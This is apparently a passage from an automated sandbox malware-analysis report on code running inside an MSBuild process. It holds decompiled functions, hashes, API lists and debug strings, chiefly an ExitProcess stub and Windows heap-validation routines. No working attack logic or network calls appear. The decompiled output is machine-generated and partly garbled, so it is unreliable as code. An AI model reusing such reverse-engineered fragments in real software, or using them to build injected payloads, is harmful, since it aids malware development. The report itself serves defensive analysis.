                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 252 41a6a3-41a6d8 call 41af60 ExitProcess
                                            C-Code - Quality: 37%
                                            			E0041A6A3() {
                                            				void* _t10;
                                            				void* _t12;
                                            				void* _t16;
                                            				void* _t17;
                                            
                                            				asm("outsb");
                                            				asm("sti");
                                            				asm("wait");
                                            				asm("aam 0xd");
                                            				 *0x57ef8ce2 =  *0x57ef8ce2 - _t10;
                                            				asm("enter 0x8b55, 0xec");
                                            				_t16 = _t17;
                                            				_t5 =  *((intOrPtr*)(_t16 + 8));
                                            				E0041AF60(_t12,  *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 8)) + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                            				ExitProcess( *(_t16 + 0xc));
                                            			}








                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: d6f0c36ffe6243364bbf69e09870d309ac9f268e838ebd79ce14f1644b1d172f
                                            • Instruction ID: e3ca366fad39fe9560296a5e4a17f1b51b98890b2822ea8c7a60d792304ed000
                                            • Opcode Fuzzy Hash: d6f0c36ffe6243364bbf69e09870d309ac9f268e838ebd79ce14f1644b1d172f
                                            • Instruction Fuzzy Hash: CFE08CB16023007AD321CF75CC89F873B68AF88B60F1485AAF9586F342CA31A644C7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041A6B0(intOrPtr _a4, int _a8) {
                                            				void* _t10;
                                            
                                            				_t5 = _a4;
                                            				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                            				ExitProcess(_a8);
                                            			}




                                            0x0041a6b3
                                            0x0041a6ca
                                            0x0041a6d8

                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7747dfd850c1bc4ed2c89955809e62ec93244d0a093f6b78868063c8b92207b6
                                            • Instruction ID: fbc3ad36472fa58d73699deddb0df04f80228b6475714041c54c916d83184f80
                                            • Opcode Fuzzy Hash: 7747dfd850c1bc4ed2c89955809e62ec93244d0a093f6b78868063c8b92207b6
                                            • Instruction Fuzzy Hash: CFB09BB19424C5C7D752E7A446087177E44B7D4745F16C076D1420641B4778C0D1F6B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • The critical section is owned by thread %p., xrefs: 010BB3B9
                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 010BB314
                                            • *** An Access Violation occurred in %ws:%s, xrefs: 010BB48F
                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 010BB323
                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 010BB53F
                                            • read from, xrefs: 010BB4AD, 010BB4B2
                                            • *** Inpage error in %ws:%s, xrefs: 010BB418
                                            • *** enter .exr %p for the exception record, xrefs: 010BB4F1
                                            • <unknown>, xrefs: 010BB27E, 010BB2D1, 010BB350, 010BB399, 010BB417, 010BB48E
                                            • write to, xrefs: 010BB4A6
                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010BB3D6
                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 010BB305
                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 010BB47D
                                            • *** enter .cxr %p for the context, xrefs: 010BB50D
                                            • a NULL pointer, xrefs: 010BB4E0
                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 010BB39B
                                            • *** then kb to get the faulting stack, xrefs: 010BB51C
                                            • Go determine why that thread has not released the critical section., xrefs: 010BB3C5
                                            • an invalid address, %p, xrefs: 010BB4CF
                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 010BB476
                                            • The resource is owned exclusively by thread %p, xrefs: 010BB374
                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 010BB352
                                            • The instruction at %p referenced memory at %p., xrefs: 010BB432
                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 010BB2F3
                                            • This failed because of error %Ix., xrefs: 010BB446
                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 010BB2DC
                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 010BB38F
                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 010BB484
                                            • The instruction at %p tried to %s , xrefs: 010BB4B6
                                            • The resource is owned shared by %d threads, xrefs: 010BB37E
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                            • API String ID: 0-108210295
                                            • Opcode ID: 184b4bd83a4325d4bc726ffd7cd36cc477e0e337efa359e3553501d6bb8b41ae
                                            • Instruction ID: 1fde22d987d168db7ba12b754521178da52e7fd435a305bf961e818314efa73b
                                            • Opcode Fuzzy Hash: 184b4bd83a4325d4bc726ffd7cd36cc477e0e337efa359e3553501d6bb8b41ae
                                            • Instruction Fuzzy Hash: 6A811131A00204FFDB266B0ADC95EFF3B66BF56B51F004085F6842B1A2D7A5C541EBB2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 44%
                                            			E010C1C06() {
                                            				signed int _t27;
                                            				char* _t104;
                                            				char* _t105;
                                            				intOrPtr _t113;
                                            				intOrPtr _t115;
                                            				intOrPtr _t117;
                                            				intOrPtr _t119;
                                            				intOrPtr _t120;
                                            
                                            				_t105 = 0xfe48a4;
                                            				_t104 = "HEAP: ";
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            					_push(_t104);
                                            					E0100B150();
                                            				} else {
                                            					E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            				}
                                            				_push( *0x10f589c);
                                            				E0100B150("Heap error detected at %p (heap handle %p)\n",  *0x10f58a0);
                                            				_t27 =  *0x10f5898; // 0x0
                                            				if(_t27 <= 0xf) {
                                            					switch( *((intOrPtr*)(_t27 * 4 +  &M010C1E96))) {
                                            						case 0:
                                            							_t105 = "heap_failure_internal";
                                            							goto L21;
                                            						case 1:
                                            							goto L21;
                                            						case 2:
                                            							goto L21;
                                            						case 3:
                                            							goto L21;
                                            						case 4:
                                            							goto L21;
                                            						case 5:
                                            							goto L21;
                                            						case 6:
                                            							goto L21;
                                            						case 7:
                                            							goto L21;
                                            						case 8:
                                            							goto L21;
                                            						case 9:
                                            							goto L21;
                                            						case 0xa:
                                            							goto L21;
                                            						case 0xb:
                                            							goto L21;
                                            						case 0xc:
                                            							goto L21;
                                            						case 0xd:
                                            							goto L21;
                                            						case 0xe:
                                            							goto L21;
                                            						case 0xf:
                                            							goto L21;
                                            					}
                                            				}
                                            				L21:
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            					_push(_t104);
                                            					E0100B150();
                                            				} else {
                                            					E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            				}
                                            				_push(_t105);
                                            				E0100B150("Error code: %d - %s\n",  *0x10f5898);
                                            				_t113 =  *0x10f58a4; // 0x0
                                            				if(_t113 != 0) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E0100B150("Parameter1: %p\n",  *0x10f58a4);
                                            				}
                                            				_t115 =  *0x10f58a8; // 0x0
                                            				if(_t115 != 0) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E0100B150("Parameter2: %p\n",  *0x10f58a8);
                                            				}
                                            				_t117 =  *0x10f58ac; // 0x0
                                            				if(_t117 != 0) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E0100B150("Parameter3: %p\n",  *0x10f58ac);
                                            				}
                                            				_t119 =  *0x10f58b0; // 0x0
                                            				if(_t119 != 0) {
                                            					L41:
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push( *0x10f58b4);
                                            					E0100B150("Last known valid blocks: before - %p, after - %p\n",  *0x10f58b0);
                                            				} else {
                                            					_t120 =  *0x10f58b4; // 0x0
                                            					if(_t120 != 0) {
                                            						goto L41;
                                            					}
                                            				}
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            					_push(_t104);
                                            					E0100B150();
                                            				} else {
                                            					E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            				}
                                            				return E0100B150("Stack trace available at %p\n", 0x10f58c0);
                                            			}












                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                            • API String ID: 0-2897834094
                                            • Opcode ID: 088abc9fa28128cee729212e91c023ebc8c54220c054a2c02c8b60fc02508183
                                            • Instruction ID: 23e6b1c729e31b18e6d1fbfc2fce3c886d424658bcd6c7b36647bc0080c23e24
                                            • Opcode Fuzzy Hash: 088abc9fa28128cee729212e91c023ebc8c54220c054a2c02c8b60fc02508183
                                            • Instruction Fuzzy Hash: 2A61C63A51154DDFD322AB48D885D7C73E4EB18F20F49807EF589AB7A3C63898419F0A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E010C4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                            				signed int _v6;
                                            				signed int _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed int _v28;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed int _t189;
                                            				intOrPtr _t191;
                                            				intOrPtr _t210;
                                            				signed int _t225;
                                            				signed char _t231;
                                            				intOrPtr _t232;
                                            				unsigned int _t245;
                                            				intOrPtr _t249;
                                            				intOrPtr _t259;
                                            				signed int _t281;
                                            				signed int _t283;
                                            				intOrPtr _t284;
                                            				signed int _t288;
                                            				signed int* _t294;
                                            				signed int* _t298;
                                            				intOrPtr* _t299;
                                            				intOrPtr* _t300;
                                            				signed int _t307;
                                            				signed int _t309;
                                            				signed short _t312;
                                            				signed short _t315;
                                            				signed int _t317;
                                            				signed int _t320;
                                            				signed int _t322;
                                            				signed int _t326;
                                            				signed int _t327;
                                            				void* _t328;
                                            				signed int _t332;
                                            				signed int _t340;
                                            				signed int _t342;
                                            				signed char _t344;
                                            				signed int* _t345;
                                            				void* _t346;
                                            				signed char _t352;
                                            				signed char _t367;
                                            				signed int _t374;
                                            				intOrPtr* _t378;
                                            				signed int _t380;
                                            				signed int _t385;
                                            				signed char _t390;
                                            				unsigned int _t392;
                                            				signed char _t395;
                                            				unsigned int _t397;
                                            				intOrPtr* _t400;
                                            				signed int _t402;
                                            				signed int _t405;
                                            				intOrPtr* _t406;
                                            				signed int _t407;
                                            				intOrPtr _t412;
                                            				void* _t414;
                                            				signed int _t415;
                                            				signed int _t416;
                                            				signed int _t429;
                                            
                                            				_v16 = _v16 & 0x00000000;
                                            				_t189 = 0;
                                            				_v8 = _v8 & 0;
                                            				_t332 = __edx;
                                            				_v12 = 0;
                                            				_t414 = __ecx;
                                            				_t415 = __edx;
                                            				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                                            					L88:
                                            					_t416 = _v16;
                                            					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                                            						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                                            						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                                            							L107:
                                            							return 1;
                                            						}
                                            						_t191 =  *[fs:0x30];
                                            						__eflags =  *(_t191 + 0xc);
                                            						if( *(_t191 + 0xc) == 0) {
                                            							_push("HEAP: ");
                                            							E0100B150();
                                            						} else {
                                            							E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            						}
                                            						_push(_v12);
                                            						_push( *((intOrPtr*)(_t332 + 0x30)));
                                            						_push(_t332);
                                            						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                            						L122:
                                            						E0100B150();
                                            						L119:
                                            						return 0;
                                            					}
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push("HEAP: ");
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push(_t416);
                                            					_push( *((intOrPtr*)(_t332 + 0x2c)));
                                            					_push(_t332);
                                            					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                            					goto L122;
                                            				} else {
                                            					goto L1;
                                            				}
                                            				do {
                                            					L1:
                                            					 *_a16 = _t415;
                                            					if( *(_t414 + 0x4c) != 0) {
                                            						_t392 =  *(_t414 + 0x50) ^  *_t415;
                                            						 *_t415 = _t392;
                                            						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                                            						_t424 = _t392 >> 0x18 - _t352;
                                            						if(_t392 >> 0x18 != _t352) {
                                            							_push(_t352);
                                            							E010BFA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                                            						}
                                            					}
                                            					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                                            						_t210 =  *[fs:0x30];
                                            						__eflags =  *(_t210 + 0xc);
                                            						if( *(_t210 + 0xc) == 0) {
                                            							_push("HEAP: ");
                                            							E0100B150();
                                            						} else {
                                            							E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            						}
                                            						_push(_v8 & 0x0000ffff);
                                            						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                                            						__eflags = _t340;
                                            						_push(_t340);
                                            						E0100B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                                            						L117:
                                            						__eflags =  *(_t414 + 0x4c);
                                            						if( *(_t414 + 0x4c) != 0) {
                                            							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                            							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            							__eflags =  *_t415;
                                            						}
                                            						goto L119;
                                            					}
                                            					_t225 =  *_t415 & 0x0000ffff;
                                            					_t390 =  *(_t415 + 2);
                                            					_t342 = _t225;
                                            					_v8 = _t342;
                                            					_v20 = _t342;
                                            					_v28 = _t225 << 3;
                                            					if((_t390 & 0x00000001) == 0) {
                                            						__eflags =  *(_t414 + 0x40) & 0x00000040;
                                            						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                                            						__eflags = _t344 & 0x00000001;
                                            						if((_t344 & 0x00000001) == 0) {
                                            							L66:
                                            							_t345 = _a12;
                                            							 *_a8 =  *_a8 + 1;
                                            							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                                            							__eflags =  *_t345;
                                            							L67:
                                            							_t231 =  *(_t415 + 6);
                                            							if(_t231 == 0) {
                                            								_t346 = _t414;
                                            							} else {
                                            								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                                            							}
                                            							if(_t346 != _t332) {
                                            								_t232 =  *[fs:0x30];
                                            								__eflags =  *(_t232 + 0xc);
                                            								if( *(_t232 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E0100B150();
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push( *(_t415 + 6) & 0x000000ff);
                                            								_push(_t415);
                                            								_push("Heap block at %p has incorrect segment offset (%x)\n");
                                            								goto L95;
                                            							} else {
                                            								if( *((char*)(_t415 + 7)) != 3) {
                                            									__eflags =  *(_t414 + 0x4c);
                                            									if( *(_t414 + 0x4c) != 0) {
                                            										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                            										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            										__eflags =  *_t415;
                                            									}
                                            									_t415 = _t415 + _v28;
                                            									__eflags = _t415;
                                            									goto L86;
                                            								}
                                            								_t245 =  *(_t415 + 0x1c);
                                            								if(_t245 == 0) {
                                            									_t395 =  *_t415 & 0x0000ffff;
                                            									_v6 = _t395 >> 8;
                                            									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                                            									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                            										__eflags =  *(_t414 + 0x4c);
                                            										if( *(_t414 + 0x4c) != 0) {
                                            											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                                            											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            											__eflags =  *_t415;
                                            										}
                                            										goto L107;
                                            									}
                                            									_t249 =  *[fs:0x30];
                                            									__eflags =  *(_t249 + 0xc);
                                            									if( *(_t249 + 0xc) == 0) {
                                            										_push("HEAP: ");
                                            										E0100B150();
                                            									} else {
                                            										E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            									}
                                            									_push( *((intOrPtr*)(_t332 + 0x28)));
                                            									_push(_t415);
                                            									_push("Heap block at %p is not last block in segment (%p)\n");
                                            									L95:
                                            									E0100B150();
                                            									goto L117;
                                            								}
                                            								_v12 = _v12 + 1;
                                            								_v16 = _v16 + (_t245 >> 0xc);
                                            								if( *(_t414 + 0x4c) != 0) {
                                            									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                            									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            								}
                                            								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                                            								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                            									L82:
                                            									_v8 = _v8 & 0x00000000;
                                            									goto L86;
                                            								} else {
                                            									if( *(_t414 + 0x4c) != 0) {
                                            										_t397 =  *(_t414 + 0x50) ^  *_t415;
                                            										 *_t415 = _t397;
                                            										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                                            										_t442 = _t397 >> 0x18 - _t367;
                                            										if(_t397 >> 0x18 != _t367) {
                                            											_push(_t367);
                                            											E010BFA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                                            										}
                                            									}
                                            									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                                            										_t259 =  *[fs:0x30];
                                            										__eflags =  *(_t259 + 0xc);
                                            										if( *(_t259 + 0xc) == 0) {
                                            											_push("HEAP: ");
                                            											E0100B150();
                                            										} else {
                                            											E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            										}
                                            										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                                            										_push(_t415);
                                            										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                            										goto L95;
                                            									} else {
                                            										if( *(_t414 + 0x4c) != 0) {
                                            											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                            											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            										}
                                            										goto L82;
                                            									}
                                            								}
                                            							}
                                            						}
                                            						_t281 = _v28 + 0xfffffff0;
                                            						_v24 = _t281;
                                            						__eflags = _t390 & 0x00000002;
                                            						if((_t390 & 0x00000002) != 0) {
                                            							__eflags = _t281 - 4;
                                            							if(_t281 > 4) {
                                            								_t281 = _t281 - 4;
                                            								__eflags = _t281;
                                            								_v24 = _t281;
                                            							}
                                            						}
                                            						__eflags = _t390 & 0x00000008;
                                            						if((_t390 & 0x00000008) == 0) {
                                            							_t102 = _t415 + 0x10; // -8
                                            							_t283 = E0105D540(_t102, _t281, 0xfeeefeee);
                                            							_v20 = _t283;
                                            							__eflags = _t283 - _v24;
                                            							if(_t283 != _v24) {
                                            								_t284 =  *[fs:0x30];
                                            								__eflags =  *(_t284 + 0xc);
                                            								if( *(_t284 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E0100B150();
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_t288 = _v20 + 8 + _t415;
                                            								__eflags = _t288;
                                            								_push(_t288);
                                            								_push(_t415);
                                            								_push("Free Heap block %p modified at %p after it was freed\n");
                                            								goto L95;
                                            							}
                                            							goto L66;
                                            						} else {
                                            							_t374 =  *(_t415 + 8);
                                            							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                                            							_v24 = _t374;
                                            							_v28 = _t400;
                                            							_t294 =  *(_t374 + 4);
                                            							__eflags =  *_t400 - _t294;
                                            							if( *_t400 != _t294) {
                                            								L64:
                                            								_push(_t374);
                                            								_push( *_t400);
                                            								_t101 = _t415 + 8; // -16
                                            								E010CA80D(_t414, 0xd, _t101, _t294);
                                            								goto L86;
                                            							}
                                            							_t56 = _t415 + 8; // -16
                                            							__eflags =  *_t400 - _t56;
                                            							_t374 = _v24;
                                            							if( *_t400 != _t56) {
                                            								goto L64;
                                            							}
                                            							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                                            							_t402 =  *(_t414 + 0xb4);
                                            							__eflags = _t402;
                                            							if(_t402 == 0) {
                                            								L35:
                                            								_t298 = _v28;
                                            								 *_t298 = _t374;
                                            								 *(_t374 + 4) = _t298;
                                            								__eflags =  *(_t415 + 2) & 0x00000008;
                                            								if(( *(_t415 + 2) & 0x00000008) == 0) {
                                            									L39:
                                            									_t377 =  *_t415 & 0x0000ffff;
                                            									_t299 = _t414 + 0xc0;
                                            									_v28 =  *_t415 & 0x0000ffff;
                                            									 *(_t415 + 2) = 0;
                                            									 *((char*)(_t415 + 7)) = 0;
                                            									__eflags =  *(_t414 + 0xb4);
                                            									if( *(_t414 + 0xb4) == 0) {
                                            										_t378 =  *_t299;
                                            									} else {
                                            										_t378 = E0102E12C(_t414, _t377);
                                            										_t299 = _t414 + 0xc0;
                                            									}
                                            									__eflags = _t299 - _t378;
                                            									if(_t299 == _t378) {
                                            										L51:
                                            										_t300 =  *((intOrPtr*)(_t378 + 4));
                                            										__eflags =  *_t300 - _t378;
                                            										if( *_t300 != _t378) {
                                            											_push(_t378);
                                            											_push( *_t300);
                                            											__eflags = 0;
                                            											E010CA80D(0, 0xd, _t378, 0);
                                            										} else {
                                            											_t87 = _t415 + 8; // -16
                                            											_t406 = _t87;
                                            											 *_t406 = _t378;
                                            											 *((intOrPtr*)(_t406 + 4)) = _t300;
                                            											 *_t300 = _t406;
                                            											 *((intOrPtr*)(_t378 + 4)) = _t406;
                                            										}
                                            										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                                            										_t405 =  *(_t414 + 0xb4);
                                            										__eflags = _t405;
                                            										if(_t405 == 0) {
                                            											L61:
                                            											__eflags =  *(_t414 + 0x4c);
                                            											if(__eflags != 0) {
                                            												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                            												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                            											}
                                            											goto L86;
                                            										} else {
                                            											_t380 =  *_t415 & 0x0000ffff;
                                            											while(1) {
                                            												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                                            												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                                            													break;
                                            												}
                                            												_t307 =  *_t405;
                                            												__eflags = _t307;
                                            												if(_t307 == 0) {
